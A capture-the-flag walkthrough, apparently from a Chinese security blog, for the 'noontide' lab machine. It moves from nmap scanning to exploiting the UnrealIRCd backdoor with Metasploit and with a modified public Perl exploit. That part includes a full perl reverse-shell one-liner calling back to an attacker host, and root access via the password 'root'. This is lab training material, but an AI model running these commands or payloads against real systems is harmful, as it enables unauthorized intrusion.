noontide

admin, 2023-02-21 12:41:04

1. Discover the target's IP address

ip a


netdiscover -i eth0 -r 192.168.100.0/24


The target is at 192.168.100.165.

2. Port and service scan with nmap

nmap -sS -Pn -A -p- -n 192.168.100.165
-sS  SYN (half-open) scan
-Pn  skip host discovery (no ping probe)
-A   aggressive scan: version detection, OS detection, default scripts and traceroute
-p-  all 65535 ports
-n   no reverse DNS lookups; when sweeping a whole range this noticeably shortens the scan

The target has 6667, 6697 and 8067 open, all IRC, and version detection identifies each of them as UnrealIRCd.


3. Search for a public exploit with searchsploit

searchsploit UnrealIRCd


The first hit is the Metasploit module.

4. Exploitation

1. Get a shell with the Metasploit UnrealIRCd module

msfconsole


search UnrealIRCd


Select that exploit with use (the module is exploit/unix/irc/unreal_ircd_3281_backdoor).


Set RHOSTS to the target:

set RHOSTS 192.168.100.165

List the payloads compatible with this module:

show payloads


Try the first one in the list:

set payload 0


Check whether anything else still needs to be set:

show options


Nothing else is required, so run it.


Upgrade the raw shell to an interactive one:

python3 -c 'import pty;pty.spawn("/bin/bash")'


Change to the user's home directory and read the first flag:

server@noontide:~/irc/Unreal3.2$ cd
cd
server@noontide:~$ ls -al
ls -al
total 40
drwxr-xr-x 4 server server 4096 Aug 8 2020 .
drwxr-xr-x 3 root   root   4096 Aug 8 2020 ..
lrwxrwxrwx 1 root   root     9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 server server 220 Aug 8 2020 .bash_logout
-rw-r--r-- 1 server server 3526 Aug 8 2020 .bashrc
drwxr-xr-x 3 server server 4096 Aug 8 2020 irc
drwxr-xr-x 3 server server 4096 Aug 8 2020 .local
-rw-r--r-- 1 server server   33 Aug 8 2020 local.txt
-rw-r--r-- 1 server server 807 Aug 8 2020 .profile
-rw-r--r-- 1 server server   66 Aug 8 2020 .selected_editor
-rw-r--r-- 1 server server 173 Aug 8 2020 .wget-hsts
server@noontide:~$ cat local.txt
cat local.txt
c53c08b5bf2b0801c5d0c24149826a6e
server@noontide:~$

Switch to root with su; the root password is the weak value root, so no further privilege-escalation work is needed:

server@noontide:~$ su root
su root
Password: root

root@noontide:/home/server# cd
cd
root@noontide:~# ls -al
ls -al
total 24
drwx------ 3 root root 4096 Aug 8 2020 .
drwxr-xr-x 18 root root 4096 Aug 8 2020 ..
lrwxrwxrwx 1 root root 9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Aug 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 85 Aug 8 2020 proof.txt
root@noontide:~# cat proof.txt
cat proof.txt
ab28c8ca8da1b9ffc2d702ac54221105

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

2. Using the public exploit with a remote download-and-execute payload


Mirror 13853.pl into the working directory:

searchsploit -m 13853.pl


vi 13853.pl


The script's built-in payloads fetch a file from a remote host and execute it, so they need to be replaced with something that calls back to us.

Generate a replacement with msfvenom; first list the perl command payloads:

msfvenom -l payloads | grep perl


msfvenom -p cmd/unix/reverse_perl LHOST=192.168.100.4 LPORT=12345 -f raw


perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.100.4:12345");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

Edit the script and replace payload1 with the one-liner just generated.


Start a listener on the attacker host for the port chosen above (for example nc -lvnp 12345), then run the exploit against the target, selecting payload 1:

perl 13853.pl 192.168.100.165 6667 1

The reverse shell connects back to the listener.


Upgrade to an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Owned. The same two flags as before:

server@noontide:~/irc/Unreal3.2$ cd
cd
server@noontide:~$ ls -la
ls -la
total 40
drwxr-xr-x 4 server server 4096 Aug 8 2020 .
drwxr-xr-x 3 root root 4096 Aug 8 2020 ..
lrwxrwxrwx 1 root root 9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 server server 220 Aug 8 2020 .bash_logout
-rw-r--r-- 1 server server 3526 Aug 8 2020 .bashrc
drwxr-xr-x 3 server server 4096 Aug 8 2020 irc
drwxr-xr-x 3 server server 4096 Aug 8 2020 .local
-rw-r--r-- 1 server server 33 Aug 8 2020 local.txt
-rw-r--r-- 1 server server 807 Aug 8 2020 .profile
-rw-r--r-- 1 server server 66 Aug 8 2020 .selected_editor
-rw-r--r-- 1 server server 173 Aug 8 2020 .wget-hsts
server@noontide:~$ cat local.txt
cat local.txt
c53c08b5bf2b0801c5d0c24149826a6e
server@noontide:~$ su root
su root
Password: root

root@noontide:/home/server# cd
cd
root@noontide:~# ls -al
ls -al
total 24
drwx------ 3 root root 4096 Aug 8 2020 .
drwxr-xr-x 18 root root 4096 Aug 8 2020 ..
lrwxrwxrwx 1 root root 9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Aug 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 85 Aug 8 2020 proof.txt
root@noontide:~# cat proof.txt
cat proof.txt
ab28c8ca8da1b9ffc2d702ac54221105

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

5. Summary

nmap scan ---- searchsploit for a public exploit ---- Metasploit UnrealIRCd module for a shell / modify the existing exploit's payload ---- su with a weak root password for privilege escalation


Originally published on the WeChat public account CTS纵横安全实验室: noontide

Source (CN-SEC中文网): https://cn-sec.com/archives/1271251.html
